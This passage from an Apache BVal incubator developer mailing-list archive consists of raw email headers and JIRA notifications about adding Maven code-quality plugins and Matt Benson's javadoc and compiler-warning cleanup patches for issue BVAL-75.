Benson <[email protected]> wrote: > Congratulations, David! -Matt > > On Jul 8, 2010, at 11:43 AM, Donald Woods wrote: > > > The BVAL PPMC recently extended committer karma to David and he has > > accepted. Welcome aboard David! > > > > -Donald > > --0016e6441c3a7f9def048ae34677-- From [email protected] Thu Jul 08 19:30:44 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36892 invoked from network); 8 Jul 2010 19:30:44 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 19:30:44 -0000 Received: (qmail 6338 invoked by uid 500); 8 Jul 2010 19:30:44 -0000 Delivered-To: [email protected] Received: (qmail 6302 invoked by uid 500); 8 Jul 2010 19:30:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 6294 invoked by uid 99); 8 Jul 2010 19:30:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 19:30:44 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 19:30:41 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o68JMnTP022179 for <[email protected]>; Thu, 8 Jul 2010 19:22:50 GMT Message-ID: <22167451.265481278616969919.JavaMail.jira@thor> Date: Thu, 8 Jul 2010 15:22:49 -0400 (EDT) From: "Bobby Warner (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (BVAL-68) Use FindBugs to reduce coding errors In-Reply-To: <926607.82211276538236071.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-68?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12886419#action_12886419 ] Bobby Warner commented on BVAL-68: ---------------------------------- Could add the checkstyle and dashboard plugins too:. <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-checkstyle-plugin</artifactId> <version>2.5</version> </plugin> <plugin> <groupId>org.codehaus.mojo</groupId> <artifactId>dashboard-maven-plugin</artifactId> </plugin> > Use FindBugs to reduce coding errors > ------------------------------------ > > Key: BVAL-68 > URL: https://issues.apache.org/jira/browse/BVAL-68 > Project: BeanValidation > Issue Type: Improvement > Components: build, jsr303 > Affects Versions: 0.1-incubating > Reporter: Donald Woods > Fix For: 0.2-incubating > > > Use FindBugs http://findbugs.sourceforge.net/ and the maven plugin for it to reduce coding errors. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jul 08 22:34:14 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6376 invoked from network); 8 Jul 2010 22:34:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 22:34:14 -0000 Received: (qmail 16309 invoked by uid 500); 8 Jul 2010 22:34:14 -0000 Delivered-To: [email protected] Received: (qmail 16270 invoked by uid 500); 8 Jul 2010 22:34:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 16262 invoked by uid 99); 8 Jul 2010 22:34:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 22:34:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 22:34:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o68MXnk8025126 for <[email protected]>; Thu, 8 Jul 2010 22:33:50 GMT Message-ID: <125694.271831278628429563.JavaMail.jira@thor> Date: Thu, 8 Jul 2010 18:33:49 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (BVAL-75) javadocs, compiler (generics) warnings, etc. MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org javadocs, compiler (generics) warnings, etc. -------------------------------------------- Key: BVAL-75 URL: https://issues.apache.org/jira/browse/BVAL-75 Project: BeanValidation Issue Type: Improvement Components: jsr303 Affects Versions: 0.2-incubating Reporter: Matt Benson Driven by my desire to understand the structure of bval, I undertook the exercise of completing the javadoc, and cleaning up as many compiler warnings as was practical, in the core and jsr303 modules. "etc." includes such things as small (method-scoped) refactorings, occasional expansion of wildcard imports, and TODO comments to note possible improvements for future consideration. I will attach a separate patch for each of the modules I have worked on. (jsr303 component selected; "core" not available) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jul 08 22:36:14 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6734 invoked from network); 8 Jul 2010 22:36:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 22:36:14 -0000 Received: (qmail 19343 invoked by uid 500); 8 Jul 2010 22:36:14 -0000 Delivered-To: [email protected] Received: (qmail 19304 invoked by uid 500); 8 Jul 2010 22:36:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19296 invoked by uid 99); 8 Jul 2010 22:36:13 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 22:36:13 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 22:36:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o68MZnAG025169 for <[email protected]>; Thu, 8 Jul 2010 22:35:49 GMT Message-ID: <11418383.271951278628549908.JavaMail.jira@thor> Date: Thu, 8 Jul 2010 18:35:49 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-75) javadocs, compiler (generics) warnings, etc. In-Reply-To: <125694.271831278628429563.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-75?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson updated BVAL-75: ---------------------------- Attachment: core.patch.txt jsr303.patch.txt patches are relative to bval/ > javadocs, compiler (generics) warnings, etc. > -------------------------------------------- > > Key: BVAL-75 > URL: https://issues.apache.org/jira/browse/BVAL-75 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: core.patch.txt, jsr303.patch.txt > > > Driven by my desire to understand the structure of bval, I undertook the exercise of completing the javadoc, and cleaning up as many compiler warnings as was practical, in the core and jsr303 modules. > "etc." includes such things as small (method-scoped) refactorings, occasional expansion of wildcard imports, and TODO comments to note possible improvements for future consideration. I will attach a separate patch for each of the modules I have worked on. > (jsr303 component selected; "core" not available) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jul 08 22:47:44 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8606 invoked from network); 8 Jul 2010 22:47:43 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 22:47:43 -0000 Received: (qmail 31081 invoked by uid 500); 8 Jul 2010 22:47:43 -0000 Delivered-To: [email protected] Received: (qmail 31045 invoked by uid 500); 8 Jul 2010 22:47:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31036 invoked by uid 99); 8 Jul 2010 22:47:43 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 22:47:43 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 22:47:41 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o68MdoSp025260 for <[email protected]>; Thu, 8 Jul 2010 22:39:50 GMT Message-ID: <21615977.272231278628790016.JavaMail.jira@thor> Date: Thu, 8 Jul 2010 18:39:50 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (BVAL-75) javadocs, compiler (generics) warnings, etc. In-Reply-To: <125694.271831278628429563.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-75?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12886532#action_12886532 ] Matt Benson commented on BVAL-75: --------------------------------- Oh, and 'mvn test' from bval/ is successful with these changes. Also, on the javadoc changes, I have used /** * {@inheritDoc} */ for any interface implementation/overridden methods. Unfortunately my maven-fu is too weak to be able to inherit comments from the RI spec source jar even when I use the 'ri' profile, but I would expect some Maven maven to be able to accomplish that if deemed desirable. > javadocs, compiler (generics) warnings, etc. > -------------------------------------------- > > Key: BVAL-75 > URL: https://issues.apache.org/jira/browse/BVAL-75 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: core.patch.txt, jsr303.patch.txt > > > Driven by my desire to understand the structure of bval, I undertook the exercise of completing the javadoc, and cleaning up as many compiler warnings as was practical, in the core and jsr303 modules. > "etc." includes such things as small (method-scoped) refactorings, occasional expansion of wildcard imports, and TODO comments to note possible improvements for future consideration. I will attach a separate patch for each of the modules I have worked on. > (jsr303 component selected; "core" not available) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jul 08 22:47:45 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8662 invoked from network); 8 Jul 2010 22:47:45 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 22:47:45 -0000 Received: (qmail 31159 invoked by uid 500); 8 Jul 2010 22:47:45 -0000 Delivered-To: [email protected] Received: (qmail 31115 invoked by uid 500); 8 Jul 2010 22:47:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31107 invoked by uid 99); 8 Jul 2010 22:47:45 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 22:47:44 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 22:47:42 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o68MdpEH025281 for <[email protected]>; Thu, 8 Jul 2010 22:39:51 GMT Message-ID: <25816740.272301278628791630.JavaMail.jira@thor> Date: Thu, 8 Jul 2010 18:39:51 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Issue Comment Edited: (BVAL-75) javadocs, compiler (generics) warnings, etc. In-Reply-To: <125694.271831278628429563.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-75?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12886532#action_12886532 ] Matt Benson edited comment on BVAL-75 at 7/8/10 6:39 PM: --------------------------------------------------------- Oh, and 'mvn test' from bval/ is successful with these changes. Also, on the javadoc changes, I have used /** * {@inheritDoc} */ for any interface implementation/overridden methods. Unfortunately my maven-fu is too weak to be able to inherit comments from the RI spec source jar even when I use the 'ri' profile, but I would expect some Maven maven to be able to accomplish that if deemed desirable. Where comments existed I have included those along with the {@inheritDoc} comment as (IMHO) appropriate. was (Author: mbenson): Oh, and 'mvn test' from bval/ is successful with these changes. Also, on the javadoc changes, I have used /** * {@inheritDoc} */ for any interface implementation/overridden methods. Unfortunately my maven-fu is too weak to be able to inherit comments from the RI spec source jar even when I use the 'ri' profile, but I would expect some Maven maven to be able to accomplish that if deemed desirable. > javadocs, compiler (generics) warnings, etc. > -------------------------------------------- > > Key: BVAL-75 > URL: https://issues.apache.org/jira/browse/BVAL-75 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: core.patch.txt, jsr303.patch.txt > > > Driven by my desire to understand the structure of bval, I undertook the exercise of completing the javadoc, and cleaning up as many compiler warnings as was practical, in the core and jsr303 modules. > "etc." includes such things as small (method-scoped) refactorings, occasional expansion of wildcard imports, and TODO comments to note possible improvements for future consideration. I will attach a separate patch for each of the modules I have worked on. > (jsr303 component selected; "core" not available) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jul 08 23:14:14 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17284 invoked from network); 8 Jul 2010 23:14:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 23:14:14 -0000 Received: (qmail 48537 invoked by uid 500); 8 Jul 2010 23:14:14 -0000 Delivered-To: [email protected] Received: (qmail 48504 invoked by uid 500); 8 Jul 2010 23:14:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48487 invoked by uid 99); 8 Jul 2010 23:14:13 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 23:14:13 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 23:14:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o68NDnfF025636 for <[email protected]>; Thu, 8 Jul 2010 23:13:49 GMT Message-ID: <24513894.273071278630829661.JavaMail.jira@thor> Date: Thu, 8 Jul 2010 19:13:49 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-75) javadocs, compiler (generics) warnings, etc. In-Reply-To: <125694.271831278628429563.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-75?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson updated BVAL-75: ---------------------------- Attachment: core.patch.txt jsr303.patch.txt New patches: I had missed a few classes in core, and a couple of protected variables in jsr303. > javadocs, compiler (generics) warnings, etc. > -------------------------------------------- > > Key: BVAL-75 > URL: https://issues.apache.org/jira/browse/BVAL-75 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: core.patch.txt, jsr303.patch.txt > > > Driven by my desire to understand the structure of bval, I undertook the exercise of completing the javadoc, and cleaning up as many compiler warnings as was practical, in the core and jsr303 modules. > "etc." includes such things as small (method-scoped) refactorings, occasional expansion of wildcard imports, and TODO comments to note possible improvements for future consideration. I will attach a separate patch for each of the modules I have worked on. > (jsr303 component selected; "core" not available) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jul 08 23:14:14 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17304 invoked from network); 8 Jul 2010 23:14:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 23:14:14 -0000 Received: (qmail 48611 invoked by uid 500); 8 Jul 2010 23:14:14 -0000 Delivered-To: [email protected] Received: (qmail 48533 invoked by uid 500); 8 Jul 2010 23:14:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48492 invoked by uid 99); 8 Jul 2010 23:14:13 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 23:14:13 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 23:14:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o68NDo4N025642 for <[email protected]>; Thu, 8 Jul 2010 23:13:50 GMT Message-ID: <31733122.273091278630830134.JavaMail.jira@thor> Date: Thu, 8 Jul 2010 19:13:50 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-75) javadocs, compiler (generics) warnings, etc. In-Reply-To: <125694.271831278628429563.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-75?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson updated BVAL-75: ---------------------------- Attachment: (was: core.patch.txt) > javadocs, compiler (generics) warnings, etc. > -------------------------------------------- > > Key: BVAL-75 > URL: https://issues.apache.org/jira/browse/BVAL-75 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: core.patch.txt, jsr303.patch.txt > > > Driven by my desire to understand the structure of bval, I undertook the exercise of completing the javadoc, and cleaning up as many compiler warnings as was practical, in the core and jsr303 modules. > "etc." includes such things as small (method-scoped) refactorings, occasional expansion of wildcard imports, and TODO comments to note possible improvements for future consideration. I will attach a separate patch for each of the modules I have worked on. > (jsr303 component selected; "core" not available) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jul 08 23:14:15 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17328 invoked from network); 8 Jul 2010 23:14:14 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 23:14:14 -0000 Received: (qmail 48659 invoked by uid 500); 8 Jul 2010 23:14:14 -0000 Delivered-To: [email protected] Received: (qmail 48570 invoked by uid 500); 8 Jul 2010 23:14:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48561 invoked by uid 99); 8 Jul 2010 23:14:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 23:14:14 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 23:14:11 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o68NDoQE025648 for <[email protected]>; Thu, 8 Jul 2010 23:13:50 GMT Message-ID: <26509669.273111278630830384.JavaMail.jira@thor> Date: Thu, 8 Jul 2010 19:13:50 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-75) javadocs, compiler (generics) warnings, etc. In-Reply-To: <125694.271831278628429563.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-75?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson updated BVAL-75: ---------------------------- Attachment: (was: jsr303.patch.txt) > javadocs, compiler (generics) warnings, etc. > -------------------------------------------- > > Key: BVAL-75 > URL: https://issues.apache.org/jira/browse/BVAL-75 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: core.patch.txt, jsr303.patch.txt > > > Driven by my desire to understand the structure of bval, I undertook the exercise of completing the javadoc, and cleaning up as many compiler warnings as was practical, in the core and jsr303 modules. > "etc." includes such things as small (method-scoped) refactorings, occasional expansion of wildcard imports, and TODO comments to note possible improvements for future consideration. I will attach a separate patch for each of the modules I have worked on. > (jsr303 component selected; "core" not available) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jul 08 23:43:44 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29112 invoked from network); 8 Jul 2010 23:43:44 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 23:43:44 -0000 Received: (qmail 83655 invoked by uid 500); 8 Jul 2010 23:43:44 -0000 Delivered-To: [email protected] Received: (qmail 83616 invoked by uid 500); 8 Jul 2010 23:43:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83608 invoked by uid 99); 8 Jul 2010 23:43:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 23:43:44 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 23:43:41 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o68NZn80025931 for <[email protected]>; Thu, 8 Jul 2010 23:35:50 GMT Message-ID: <23760800.273801278632149925.JavaMail.jira@thor> Date: Thu, 8 Jul 2010 19:35:49 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-75) javadocs, compiler (generics) warnings, etc. In-Reply-To: <125694.271831278628429563.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-75?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson updated BVAL-75: ---------------------------- Attachment: jsr303.patch.txt updated patch yet again, more stuff I missed :/ > javadocs, compiler (generics) warnings, etc. > -------------------------------------------- > > Key: BVAL-75 > URL: https://issues.apache.org/jira/browse/BVAL-75 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: core.patch.txt, jsr303.patch.txt > > > Driven by my desire to understand the structure of bval, I undertook the exercise of completing the javadoc, and cleaning up as many compiler warnings as was practical, in the core and jsr303 modules. > "etc." includes such things as small (method-scoped) refactorings, occasional expansion of wildcard imports, and TODO comments to note possible improvements for future consideration. I will attach a separate patch for each of the modules I have worked on. > (jsr303 component selected; "core" not available) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jul 08 23:43:47 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29162 invoked from network); 8 Jul 2010 23:43:47 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Jul 2010 23:43:47 -0000 Received: (qmail 83722 invoked by uid 500); 8 Jul 2010 23:43:47 -0000 Delivered-To: [email protected] Received: (qmail 83682 invoked by uid 500); 8 Jul 2010 23:43:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83674 invoked by uid 99); 8 Jul 2010 23:43:47 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 23:43:47 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jul 2010 23:43:44 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o68NZrm3025964 for <[email protected]>; Thu, 8 Jul 2010 23:35:53 GMT Message-ID: <12146086.273911278632153690.JavaMail.jira@thor> Date: Thu, 8 Jul 2010 19:35:53 -0400 (EDT) From: "Matt Benson (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (BVAL-75) javadocs, compiler (generics) warnings, etc. In-Reply-To: <125694.271831278628429563.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/BVAL-75?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Matt Benson updated BVAL-75: ---------------------------- Attachment: (was: jsr303.patch.txt) > javadocs, compiler (generics) warnings, etc. > -------------------------------------------- > > Key: BVAL-75 > URL: https://issues.apache.org/jira/browse/BVAL-75 > Project: BeanValidation > Issue Type: Improvement > Components: jsr303 > Affects Versions: 0.2-incubating > Reporter: Matt Benson > Attachments: core.patch.txt, jsr303.patch.txt > > > Driven by my desire to understand the structure of bval, I undertook the exercise of completing the javadoc, and cleaning up as many compiler warnings as was practical, in the core and jsr303 modules. > "etc." includes such things as small (method-scoped) refactorings, occasional expansion of wildcard imports, and TODO comments to note possible improvements for future consideration. I will attach a separate patch for each of the modules I have worked on. > (jsr303 component selected; "core" not available) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jul 09 